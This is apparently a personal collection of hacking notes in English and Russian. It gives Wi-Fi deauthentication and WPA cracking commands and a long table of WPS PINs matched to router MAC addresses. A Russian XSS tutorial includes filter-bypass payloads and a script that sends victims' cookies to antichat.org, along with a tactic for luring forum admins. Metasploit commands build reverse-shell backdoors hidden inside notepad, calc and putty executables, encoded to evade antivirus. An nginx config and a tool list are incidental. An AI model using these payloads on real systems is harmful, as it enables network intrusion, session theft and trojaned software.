21.04.2015

fireeye test malware

Callback:    http://fedeploycheck.fireeye.com/appliance-test/alert.html
Callback-block:   http://fedeploycheck.fireeye.com/appliance-test/block.html
Binary-analys  http://fedeploycheck.fireeye.com/appliance-test/test-infection.exe
Web-Analysis:  http://fedeploycheck.fireeye.com/appliance-test/test-infection.pdf
Web-Analysis 2:http://fedeploycheck.fireeye.com/appliance-test/test-infection.new.pdf

openwrt erase rootfs_data

mtd -r erase rootfs_data

wifi-scan-crack

iw dev wlan0 scan | grep SSID

iwlist wlan0 frequency

iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"

iw dev wlan0 interface add mon0 type monitor

ifconfig mon0 up

iw dev mon0 interface del


airmon-ng start wlan0
airodump-ng --bssid AC:4B:C8:31:C0:00 --channel 6 -w XXX-test mon0 --ignore-negative-one
aireplay-ng -0 100 -e XXX -a AC:4B:C8:31:C0:00 -c C0:14:3D:DC:0A:03 mon0 --ignore-negative-one
aircrack-ng -e XXX -b AC:4B:C8:31:C0:00 -w /root/passwords-lite.lst XXX-test-01.cap


wireshark-password

http:.request.method == "POST"
use the ”Follow TCP Stream“

WPS-PIN

tplink
WPS-PIN: 66870913
Essid: TP-LINK_777; TP-LINK_FD69D0 after reset
Router model: TL-WR741N

Router model: TL-WR841N
WPS-PIN: 85075542

Router model: TL-WR842ND
WPS-PIN: 55117319

MODEL: TD-W8960N
BSSID: 74:EA:3A:BC:75:D6
WPS: 37211202

MODEL: TD-W8960N
BSSID: 90:F6:52:DE:23:1B
WPS: 95817149

MODEL: TD-W8960N
BSSID: F8:D1:11:7D:CC:54
WPS: 41441282

MODEL: TD-W8960N
BSSID: 90:F6:52:48:E1:73
WPS: 20917784

MODEL: TD-W8961ND
BSSID: 90:f6:52:56:93:5c
WPS: 56738209

MODEL: TD-W8961ND
BSSID: b0:48:7a:d5:e4:6d
WPS: 40176451

MODEL: TD-W8961ND
BSSID: b0:48:7a:d1:cc:79
WPS: 37493691

MODEL: TD-W8961ND
BSSID: b0:48:7a:f0:b1:08
WPS: 57739601

MODEL: TD-W8961ND
BSSID: b0:48:7a:d5:e7:a6
WPS: 40184708

MODEL: TD-W8961ND
BSSID: b0:48:7a:d5:e0:66
WPS: 40166148

MODEL: TD-W8961ND
SSID: TP-LINK_8F2DFA
BSSID: f8:d1:11:8f:2d:fa
WPS: 93834186

MODEL: TD-W8961ND
BSSID: f8:d1:11:8f:21:a3
WPS: 93802598

MODEL: TD-W8961ND
BSSID: b0:48:7a:d1:d0:eb
WPS: 37505073

MODEL: TD-W8961ND
SSID: wirelessnetwork
BSSID: b0:48:7a:f5:d8:2b
WPS: 61116597

MODEL: TD-W8961ND
BSSID: b0:48:7a:d1:cc:ca
WPS: 37494506

MODEL: TD-W8961ND
BSSID: b0:48:7a:d1:cc:9e
WPS: 37494063

MODEL: TD-W8961ND
SSID: TP-LINK_D1CAA5
BSSID: b0:48:7a:d1:ca:a5
WPS: 37489014

MODEL: TD-W8961ND
SSID: wireless
BSSID: b0:48:7a:d1:cd:68
WPS: 37496081

MODEL: TD-W896N1D
BSSID: b0:48:7a:d1:cc:d9
WPS: 37494650

MODEL: TD-W8961ND
BSSID: b0:48:7a:d1:cb:0b
WPS: 37490034
---------------------
netgear devices
Spoiler (Click to Hide)
MODEL: NETGEAR DGN1000
BSSID: E0:46:9A:0A:69:4A (wlan)
BSSID: 00:25:D3:BE:2E:00 (ADSL)
WPS: 19004938

MODEL: Netgear DGN1000
BSSID: E0:91:F5:43:48:10 (wlan)
BSSID: E0:91:F5:43:48:11 (ADSL)
WPS: 82234577

MODEL: Netgear DGN1000
BSSID: 30:46:9A:1E:EE:BA (wlan)
BSSID: 30:46:9A:1E:EE:BB (ADSL)
WPS: 30022645

MODEL: NETGEAR DGN1000
BSSID: 00:26:F2:41:9E:DA (wlan)
BSSID: 00:26:F2:41:9E:DB (ADSL)
WPS: 32312966

MODEL: NETGEAR DGN1000
BSSID: 30:46:9A:28:A3:7A (wlan)
BSSID: 30:46:9A:28:A3:7B (ADSL)
WPS: 27334959

MODEL: NETGEAR DGN1000

Model: Netgear WNR2000
WPS Pin: 50292127

BSSID: 00:26:F2:41:98:2C (wlan)
BSSID: 00:26:F2:41:98:2D (ADSL)
WPS: 37380342

MODEL: Netgear DGN2000
BSSID: 00:24:B2:3F:4A:EC (wlan)
BSSID: 00:24:B2:3F:4A:ED (ADSL)
WPS: 38686191

MODEL: NETGEAR DG834GU
BSSID: 00:26:F2:78:FB:3E (wlan)
BSSID: 00:26:F2:78:FB:41 (ADSL)
WPS: 64426679
-------------------------
Belkin devices
Spoiler (Click to Hide)
MODEL: Belkin F9J1102 v1
BSSID: EC:1A:59:2B:92:46 (WLAN)
BSSID: EC:1A:59:2B:92:47 (WAN)
SERIAL: 121230HF102382
WPS: 19366838

MODEL: Belkin F9J1102 v1
SSID: belkin.b82
BSSID: 08:86:3B:DA:1B:82 (WLAN)
BSSID: 08:86:3B:DA:1B:83 (WAN)
SERIAL: 121212HF111888
WPS: 87279320

MODEL: Belkin F9J1102 v1
BSSID: 08:86:3B:DA:36:72 (WLAN)
BSSID: 08:86:3B:DA:36:73 (WAN)
SERIAL: 121212HF113612
WPS: 83469909

MODEL: Belkin F9J1102 v1
SSID: belkin.630
BSSID: 08:86:3B:DB:36:30 (WLAN)
BSSID: 08:86:3B:DB:36:31 (WAN)
SERIAL: 121213HF100703
WPS: 14159114

MODEL: Belkin F7D4401 v1
SSID: belkin.96b3
BSSID: 94:44:52:F6:B3:B5 (WLAN)
BSSID: 94:44:52:F6:B3:B6 (WAN)
SERIAL: 121107H4101566
WPS: 15310828

MODEL: Belkin F7D4401 v1
BSSID: 08:86:3B:08:55:22 (WLAN)
BSSID: 08:86:3B:08:55:23 (WAN)
SERIAL: 121110H4100034
WPS: 36323364

MODEL: Belkin F7D4401 v1
SSID: belkin.9643
BSSID: 94:44:52:F6:B6:26 (WAN)
BSSID: 94:44:52:F6:B6:25 (WLAN)
SERIAL: 121107H4101722
WPS: 17579957

MODEL: Belkin F7D4401 v1
SSID: belkin.9689
BSSID: 08:86:3B:27:46:81 (WAN)
BSSID: 08:86:3B:27:46:80 (WLAN)
SERIAL: 121119H4100938
WPS: 08112118

MODEL: BELKIN N+ F5D8635-4v1
SSID: Belkin
BSSID: 00:22:75:AC:3F:DC (WAN)
BSSID: 00:22:75:AC:3F:DA (WLAN)
WPS: 12885381

MODEL: Belkin F5D8635-4v1
BSSID: 94:44:52:2D:95:C3 (WLAN)
BSSID: 94:44:52:2D:95:C5 (WAN)
WPS: 29874590

MODEL: Belkin F7D3402 v1
SSID: Belkin.81D9
BSSID: 94:44:52:9E:11:DA (WAN)
BSSID: 94:44:52:9E:11:D9 (WLAN)
SERIAL: 121029H3104154
WPS: 08318725
--------------------------
Dlink devices
Spoiler (Click to Hide)

MODEL: DIR-655
WPS-PIN: 95061771
Essid: D-Link DIR-655; dlink after reset

MODEL: DSL-2740B-F1
BSSID: 14:D6:4D:91:C2:73 (wlan)
BSSID: 14:D6:4D:91:C2:72 (ADSL)
WPS: 44686871

MODEL: DSL-2740B
BSSID: 14:D6:4D:F3:F8:E8 (wlan)
BSSID: 14:D6:4D:F3:F8:E7 (ADSL)
WPS: 59185239
-------------------
00:14:D1 26848185 1234XXXX  
00:18:E7 15537782 
00:19:15 12345670 63396638 
00:19:70 4286XXXX 6496XXXX 
00:21:29 64637129 22310298 64103747 95891705 
00:24:17 31011193 
00:26:44 7820XXXX 78202962 49780871 
00:38:72 1562XXXX 18836486 
00:48:7A 15471628 
00:0C:F1 30447028 
00:1A:2B 15624697 8847XXXX 
00:1D:19 
00:1D:7E 66026402 
00:1D:73 88420707 
00:4F:62 21207136 
7C:4F:B5 75332662 72688656 
A0:21:87 92442559 
A0:21:B7 63825XXX 0634XXXX 01318104 6557XXXX 0669XXXX 5400XXXX 1441XXXX 
5C:33:8E 82848439 11765592 43154XXX 1111XXXX 9901XXXX 
84:A8:E4 7996XX00 
30:46:9A 9754XXXX 95221XXX 3444XXXX 344449XX 1504XXXX 19482417 95221021 2170XXXX 
30:39:F2 1670XXXX 16538061 4329XXXX 1340XXXX 1835XXXX 8820XXXX 
50:67:F0 20064525 26599625 146076XX 1452XXXX 18674095 91726681 44947477 05884889 8253600 52594809 51660567 95048147 19634173 72344071 03419724 11288879 67971862 23380622 42768777 04898702 09165847 
F4:3E:61 
58:6D:8F 47158382 69382161 
94:44:52 93645348 2444XXXX 5319XXXX 26023809 
08:86:3B 21250491 
40:4A:03 11866428 79205177 
64:68:0C 7996XXXX 
88:25:2C 7654XXXX 03526859 7442XXXX 74425648 3565XXXX 0452XXXX 
04:C0:6F 0751XXXX 
20:4E:7F 45197079 
20:2B:C1 1957XXXX 
F8:D1:11 4867XXXX 
F4:C7:14 
C4:3D:C7 5141XXXX 51419981 6810XXXX 
B0:48:7A 0055XXXX 54335677 8667XXXX 
1C:7E:E5 6041XXXX 22609298 60418579 
38:60:77 
CC:96:77 
C0:C1:C0 78985933 7898XXXX 
C0:AC:54 
C0:3F:0E 8345XXXX 2585XXXX 2503XXXX 
34:08:04 36022656 93395274 
74:44:01 3555XXXX 00446747 2761XXXX 27615126 4522XXXX 4545XXXX 
BC:76:70 6326XXXX 6343XXXX 63431919 6431XXXX 
00:1D:CE 85560130 
58:98:35 53890894 
DC:0B:1A 1653XXXX 18355604 88202907 13409708 43297917 21158766 
38:72:C0 12345678 2017XXXX 
72:C0:6F 3863XXXX 
6A:C7:14 3205XXXX 3227XXXX 3365XXXX 3495XXXX CO:3F:0E 8321XXXX 25032918 
72:A8:E4 3357XXXX 
62:C0:6F 3663XXXX 3442XXXX 3304XXXX 
00:0B:3B 3814XXXX 
00:24:01 97744757 
E0:CB:4E 62987523 
00:26:CE
00:11:6B  3042XXXX 
5C:35:3B 64874487 6487XXXX 9575XXXX 
00:26:24 95374611 
68:C0:6F 41719565 
00:26:5A 76971464 
1A:0B:40 17068161 
6A:C0:6F 3722XXXX 3539XXXX 
6A:A8:E4 3416XXXX 5198XXXX 
54:E6:FC 5325XXXX 53256XXX 9999XXXX 
E0:69:95 
00:22:F7 2456XXXX 
CC:96:A0 5051XXXX 5090XXXX 1623XXXX 
00:18:02 16546615 
2C:B0:5D 5482XXXX 5535XXXX 
08:10:74 20956455 
00:22:3F 48247818 
C8:3A:35 11195207 
00:1F:1F 85521162 85521261 85544482 
D8:5D:4C 7452XXXX 
D0:AE:EC 2417XXXX 0934XXXX 5089XXXX 
80:B6:86 4049XXXX 3632XXXX 
90:F6:52 15094148 61296879 26412948 
22:4E:7F 1558XXXX 
94:0C:6D 3795XXXX 
74:EA:3A 8388XXXX 
1C:AF:F7 0630XXXX DC:OB:1A 
00:A0:26 8224XXXX 
00:1F:A4 
C8:60:00 46264848 
F8:3D:FF 25905892 
A0:0B:BA 00000000 
72:3D:FF 50540686 
50:7E:5D 8840XXXX 8846XXXX 
E4:7C:F9 
00:12:FB 
72:C7:14 33614XXX 
C0:EF:0E 11034XXX 29159XXX 
59:98:35 34739XXX 
00:0A:52
5C:33:E8
94:FE:F4  43944552 
53:33:8E 9924XXXX 
62:55:9C 0111XXXX 
6A:55:9C 9957XXXX 
00:1D:1A 2053XXXX 
38:72:0C 
1C:C6:3C 1860XXXX 
72:E8:7B 1478XXXX 
74:31:70 7776XXXX 
10:C6:1F 22643223 
98:FC:11 55132909 93532655 
00:23:08 
14:D6:4D 20700737 64535203 
54:6E:FC 02917092 
C8:D5:FE 
00:22:6B 59900887 
AC:E8:7B 77502896 
00:4F:67 13648947 
19:15:C1 
E0:91:15 42764199 
00:05:59 2519XXXX 
08:76:FF 79412988 
00:11:22 6541XXXX 
14:D6:D4 31008167 
14:E6:E4 8118XXXX 
00:1D:D1 37272937 
00:B0:0C 1924XXXX 
E8:40:F2 4676XXXX 
8C:CA:32 71259987 
00:30:4F 8764XXXX 
00:26:5B 28390046 
00:1D:CD 9839XXXX 
F4:6D:21 8XXXXXXX 
5C:4C:A9 1234567X 
1C:BD:B9 55349758 70313376 
4C:17:EB 
00:19:18 
00:25:9C 78091597 
4C:60:DE 42473534 22958143 53550866 
6A:1D:67 04161608 
00:1D:D2 49143836 58542132 14550126 
B4:74:9F 23659391 
E0:91:F5 49945386 
62:C7:14 32184129 
84:1B:5E 78100053 1354XXXX 
00:23:69 51348014 
80:1F:02 
00:24:A5 44960452 
00:23:CD 54080812 
50:46:5D 21101021 46540010 
B8:A3:86 19217581 
B8:9B:C9 41613849 
54:04:A6 31028325 3211XXXX
00:0B:3B 3814XXXX
00:0C:F1 30447028
00:11:6B 3042XXXX
00:14:D1 26848185,1234XXXX
00:18:02 16546615
00:18:E7 15537782
00:19:15 12345670
00:19:70 12345670,64637129,22310298
00:1A:2B 15624697,8847XXXX
00:1D:19 12345670,66026402
00:1D:73 88420707
00:1D:7E 66026402
00:1D:CE 85560130
00:21:29 64637129,22310298
00:21:91 82744458
00:22:F7 2456XXXX
00:24:01 97744757
00:24:17 31011193
00:26:24 95374611
00:26:44 7820XXXX,78202962
00:26:5A 76971464
00:26:CE 1148XXXX,11446958,7026XXXX,7047XXXX,9566XXXX,10770 511,32754544,28161141,09735651,2091XXXX,11508335,1 1516675,11450764,11515562,11432401,11455776,115167 05,11509059,11483465,11480044
00:26:E8 15483607
00:38:72 1562XXXX,18836486
00:48:7A 15471628
00:4F:62 21207136
04:C0:6F 0751XXXX
08:86:3B 21250491,3737XXXX
1A:0B:40 17068161
1C:7E:E5 6041XXXX,22609298,60418579
1C:AF:F7 0630XXXX
20:2B:C1 1957XXXX
20:4E:7F 45197079
2C:B0:5D 5482XXXX
30:39:F2 1670XXXX,16538061,4329XXXX,1340XXXX
30:46:9A 9754XXXX,95221XXX,3444XXXX,344449XX,1504XXXX,19482 417,95221021
34:08:04 36022656,93395274
38:60:77 12345670,78985933,7898XXXX
38:72:C0 12345678
40:4A:03 11866428
50:67:F0 20064525
54:E6:FC 5325XXXX,53256XXX,9999XXXX
58:6D:8F 47158382,69382161
58:6D:8F 69382161
58:98:35 53890894
5C:33:8E 82848439,11765592,43154XXX,9901XXXX
5C:35:3B 64874487,6487XXXX,9575XXXX
62:C0:6F 3663XXXX,3442XXXX
64:68:0C 7996XXXX
68:C0:6F 41719565
6A:A8:E4 3416XXXX
6A:C0:6F 3722XXXX
6A:C7:14 3205XXXX
72:A8:E4 3357XXXX
72:C0:6F 3863XXXX
74:44:01 3555XXXX,00446747,2761XXXX,27615126
78:A2:E4 5390XXXX
7C:4F:B5 75332662,72688656,00948135
84:A8:E4 7996XX00
84:C9:B2 54772373
88:25:2C 7654XXXX,03526859,7442XXXX,74425648,3565XXXX,0452X XXX
94:0C:6D 3795XXXX
94:44:52 93645348,2444XXXX,5319XXXX,26023809
A0:21:87 92442559
A0:21:B7 63825XXX,0634XXXX,01318104,6557XXXX,0669XXXX,0996X XXX
B0:48:7A 0055XXXX,54335677,1111XXXX
BC:76:70 6326XXXX,6343XXXX,63431919
C0:3F:0E 8345XXXX,2585XXXX,2503XXXX
C0:AC:54 8345XXXX,2585XXXX,2503XXXX
C0:C1:C0 78985933,7898XXXX,04840954
C4:3D:C7 5141XXXX,51419981,6810XXXX
C8:3A:35 01756401
CC:5D:4E 53084682
CC:96:77 12345670,78985933,7898XXXX
CC:96:A0 5051XXXX
CO:3F:0E 8321XXXX,25032918
DC:0B:1A 1653XXXX,1835XXXX
E0:69:95 2456XXXX
E0:CB:4E 62987523
F4:3E:61 47158382,69382161
F4:C7:14 12345670,5141XXXX,51419981,6810XXXX
F4:EC:38 26599625,146076XX,1452XXXX,18674095
F8:D1:11 4867XXXX
FC:75:16 46264848
WPS PIN: ’20172527′
02:10:18:01:00:02

WPS Pin: ’20172527′
14-14-4B-8C-A2-DC

WPS PIN: ’20172527′
14:14:4B:3E:E3:38

WPS PIN: ’20172527′
14:14:4B:3F:65:B5

WPS PIN: ’20172527′
14:14:4B:8B:9C:26

00:1A:A9:B7:7A:B5
WPS PIN: ’20172527′

WPS Pin: ’20172527′
14-14-4B-3F-5C-FF

WPS PIN: ’20172527′
14:14:4B:3F:56:BA

______________________

WPS PIN: ’14169809′
14:14:4B:8B:44:92

14:14:4B:AD:8F:60
WPS PIN: ’14169809′

_____________________

WPS PIN: ’17084215′
14:14:4B:3F:34:EB

WPS PIN: ’17084215′
00:1A:A9:C9:EC:D3

______________________

WPS pin: ’15624697′
00-1A-A9-B9-89-FE

WPS PIN: ’15624697′
00 1A A9 B9 46 42

00:1A:A9:C8:37:48
WPS PIN: ’15624697′

00:1A:A9:C7:FA:3F
WPS PIN: ’15624697′

______________________

WPS PIN: ’18836486′
00:1A:A9:B3:16:59

WPS PIN: ’18836486′
00:1A:A9:C7:C8:64

WPS PIN: ’18836486′
00:1A:A9:B3:0B:78

WPS PIN: ’18836486′
00:1A:A9:C8:8C:11

______________________

B8:A3:86:40:6F:A0
WPS PIN: ’76229909′

dlink 2640 — WPS PIN: 46264848

Декабрь 13th, 2013 at 19:28:22 mani Says:
AC:22:0B:7D:5D:2C
WPS Pin: ’20172527


xss

"><script>alert('XSSPOSED') </script>
### Итак, перейду конкретно к тому, как найти в данном сайте XSS.

Как я раньше уже писал что XSS состоит из тегов, они же состоят из html, и javascript языка =).

Javascript можно вписывать в html.
Можно кодировать, чтобы обойти фильтры. Но об этом позже.

Как узнать, что XSS на даном сайте проходит?
Ужасна распрастраннёная узявимость типа
<script>alert()</script> Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.

Самая распостраненая XSS (наблюдаеться во всех местах где плохая фильтрация):
"><script>alert()</script>
Вся суть в "> .
Давайте подумаем, что мы делаем, когда вводим в поле "><script>alert()</script> , что происходит?
Мы вводим в форму "><script>alert()</script> какой-то переменной присваиваеться значение поля. Переменная обрабатывается, "> выполняеться, закрывает
скрипт и выпролняет <script>alert()</script>

Эта XSS самая распостраненая в поисковиках:
Просматриваем все поля сайта и пытаемся вставить "><script>alert()</script>
Если вышло сообщение - вы нашли XSS...

========================================


### А как определить есть фильтр или нет?

Просто в любое поле вводим: '';!--"<fuck>=&{()}
Дальше открываем html страничку и ищем слово "fuck"
и смотри последующие сиволы..

Если <> так и остались то это перваый признак уязвимости - значит фильтр имеет дырку.
Если ,"'\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке.
Затем, если открыв HTML, вы не обнаружили <> то скорее всего дырка в фильтре.
Если открыв HTML вы обнаружили, что <> заменены на другие символы, то это облом - фильтр по крайней
мере функционирует нормально.
Возможно еще ввести в поле для проверки фильтрации вот так: "><>'"`,/\?@%

Рассмотрим случай если фильтр съедает <>

В этом случае существует вероятность дырки.
К примеру, у фильтра условие съедать <script>,<> и .
Тогда пробуем <zxcvbnzxc792> и смотрим, если не съелось - нашли дырку...дальше можно составить боевой XSS-скрипт.

Ещe существует метод вложенного скрипта, к примеру вот так:
<sc<script>ript>alert()</sc</script>ript>
это, если фильтр не оч. сильный и плохо фильтрует.

Еще можно попробовать во так:
>>>><<script бывает, что фильтр подсчитывает откр. и закр. скобки и закрывает сам. Сначало фильтрует, а потом закрывает... что дает нам дырку к инъекции скрипта.

Частенько бывает что фильтр дополняет скрипт, к примеру вот этим :
">
http://******.ru/trye.asp?sessionID="><IMG%20SRC="javascript:alert();

Фильтр смотрит, что ничего опасного в <IMG%20SRC="javascript:alert(); нет, закрывает и тем самым
выполняя скрипт.

Еще конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код.

Все надо пытаться методом проб и ошибок искать...
Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра.
Методом тыков понять, как фильтр работает, есть ли у него недоработки.
Если фильтр плохой, мы всегда можем вставить скрипты.

========================================


### Активные XSS

Тут надо использовать разрешенные теги и прекрываясь ими, надо выполнить запрос.

Например, теги url,bb,img.
Весь смысл вставки заключается в том, что нам надо встроить запрос в париметр img или url. У Img есть много парметров кроме src и alt.
Этот баг очень часто используется на форуме, в гостевухах...

Рассмотрим активные XSS.

Предупреждения!!!
Теги [fon*t],[im*g],[ur*l] пишутса с * для того, штобы они не использовались данным форумом.
Для использувания этих тегов удалите *.

К примеру просмотрим форум на наличие использования тегов [fon*t],[im*g],[ur*l] и попытаться вставить в них скрипт или комбинировать их.:

[im*g]httр://www.qwewqw.ru/1.jpg[/im*g]Выходит крестик...значит img используется и мы его подобрали (просто дело в том, что бывает img включен, а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании
разной формы) если крестика нет...а висит всего надпись, то попробуйте еще так:
[im*g src=httр://www.qwewqw.ru/1.jpg]

Ну так вот к примеру мы добились крестика этим:
[im*g]httр://www.qweqw.ru/1.jpg[/im*g]

Проверим держит ли фильтр пробел, добавляем пробел после расширения jpg :
[im*g]httр://www.qweqw.ru/1.jpg [/im*g]
если крестик есть - тогда всё ОК.

Далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт. Пытаемся к примеру вставить:
[im*g]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im*g]
проверяем, отсылаем - появиться сообщение - значит нашли активную XSS и вместо alert() можете вставить любой скрипт.

Если фильтр не сдался попробуйте так:
[im*g]http://www.qweqw.ru/"/dynsrc="javascript:alert()"/1.jpg[/im*g]
и
[im*g]http://www.qwewqw.ru/"/dynsrc=javascript:alert()/1.jpg[/im*g]

Если с приведённых примеров получился крестик, то httр://www.qweqw.ru/1.jpg заменяем на адрес сниффера.

Бывают случаи, когда jpg отключен админом.

========================================


###Мы всё время делали коды типа:

<script>alert('HakNet')</script>
javascript:alert('HakNet')
javascript:alert('HakNet')/1.jpg и так далие..
Но они никакой пользы не принесли, это просто коды для проверки(тестировки) на Xss.

Вот скрипт:
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
Он уже ворует куки =)

========================================


###Как его подставить к ссылке с Xss?

Да очень легко...
Есть несколко вариантов:

- 1)делаем вот так:
http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script>
где **** сайт с Xss.

Вот сам составленый скрипт:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>

- 2)Можно ещё делать вот так:
http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
где обращаетса к http://haknet.h16.ru/script/js.js

а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.

Но как я уже писал - иногда бывают затруднения с фильтрами на сайте (не прокатывает наш скрипт).
Тогда нужно подумать, как его обойти.
Можно просто нечто добавить, нечто поменять, или удалить в скрипте.
Но есть более надёжным вариант, когда мы просто закодируем скрипт. Для этого есть много прог.
Есть такой сайт как http://ha.ckers.org/xss.html (кодировщик-дэкодировщик).

Вот пример:
%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

это был закодированный:

http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>

- 3) Особенно шифрование необходимо не только для обмана фильтров, но и для обмана АДМИНА при использовании ПАССИВНОЙ ХСС.

Вот такой пример на основе социальной инженерии.
Ищем контакт с админом форума бросаем в форуме ему линк на свой сайт, и говориш типа так "клевая фича есть на сайте" и так дале в том же духе.
А на нашем сайте будет как вы уже догадались =) вот ето скрипт:

<script language="JavaScript">
document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
</script>

Что делает document.location.href вы спросите меня? )).. это ява-код, который без запроса переходит на указаной сайт Так чо ж у нас получается, дали мы линк админу, и он зашел на наш сайт, вот что делается.. его быстро бросает на

%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
а это уже и есть наш Xss в зашифрованом виде.

Примечание: это подействует только тогда, когда Xss будет принадлежать админу сайта которому вы бросили линк...
Иными словами ТРУДНОСТЬ ПАССИВНОЙ ХСС состоит в том, что уязвимость может быть использована ТОЛЬКО, если жертва АВТОРИЗОВАНА на уязвимом сайте!!!

nginx-balanser-conf.d.conf

upstream webservers {
# Перечисляем все backend между которыми nginx будет балансировать клиентов, говорим количество fail для баны backend ноды и таймаут
        server  192.168.1.81:8080 weight=10 max_fails=60 fail_timeout=2s;
        server  192.168.1.82:8080 weight=10 max_fails=60 fail_timeout=2s;

}

server  {
        listen          192.168.1.80:80;
        server_name     balanser.com.ua www.balanser.com.ua
        reset_timedout_connection  on; #заставляет nginx принудительно закрывать соединения в состоянии ожидания по истечению таймаута.

location / {
        proxy_pass      http://webservers;
        proxy_next_upstream error timeout invalid_header http_500 http_503; #указывает модулю проксирования, что надо переходить к следующему бекэнду в случае возникно$
        proxy_set_header   Host   $host; #устанавливает заголовки
        proxy_set_header   X-Real-IP  $remote_addr;
        proxy_set_header   X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_redirect off; #запрещает выполнять редирект
        proxy_connect_timeout 30; #описывает время ожидания ответа от бекэнда.
}
}

msf-tip

# ./msfpayload windows/meterpreter/reverse_https LHOST=10.13.37.6 LPORT=443 X> /tmp/reverse_https_443.exe

#./msfconsole

=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST 10.13.37.6
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started HTTPS reverse handler on https://10.13.37.6:443/
[*] Starting the payload handler...



msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R |


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE

 ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.69 R | ./msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5



msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe
msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5







msfpayload windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx R | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -x /root/notepad.exe -k -o /root/backdoor.exe -e x86/shikata_ga_nai -c 2



Metasploit Payloads - msfpayload
This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.

These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.


1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe


awk


#!/bin/bash
egrep -e sex -e redtube -e xxx -e porn -e DANGER-RSW -e DANGER-SW -e DANGER-scan  /var/log/messages |awk '{print $6,$9,$10}' | egrep --color -e sex -e redtube -e xxx -e porn -e DANGER-SW -e DANGER-RSW -e DANGER-scan

15.04.2015

[x-tools] Pack0.1

PhpSploit
URL: https://github.com/nil0x42/phpsploit
PhpSploit — это фреймворк для удаленного управления, нацеленный на предоставление скрытого интерактивного shell-подобного соединeния через HTTP между клиентом и веб-сервером. Как ты, наверное, уже понял из этой витиеватой фразы, это инструмент для постэксплуатации, и он способен пoддерживать доcтуп к скомпрометированному серверу в целях повышения привилегий на нем.
=============================
AndroBugs Framework
Фреймворк AndroBugs — это сканер уязвимостей для приложений под Android, который может пригодиться как исследователям безопасности, так и разработчикам приложений для поиска потенциальных уязвимостей в коде приложений.
=============================
joomlavs
URL: https://github.com/rastating/joomlavs
Joomlavs — это инструмент, который позволяет оценить, насколько уязвима инсталляция Joomla. Инструмент имеет базовые фингерпринты и может сканировать на уязвимости
=============================
Как повысить привилегии в Windows?
Инструмент windows-privesc-check ищет различные ошибочные конфигурации, которые позволят локальному непривилегированному пользоватeлю повысить свои привилегии до другого пользoвателя или для доступа к локальному приложению (например, базе данных).
=============================
Атакуем Enterprise Wireless Networks
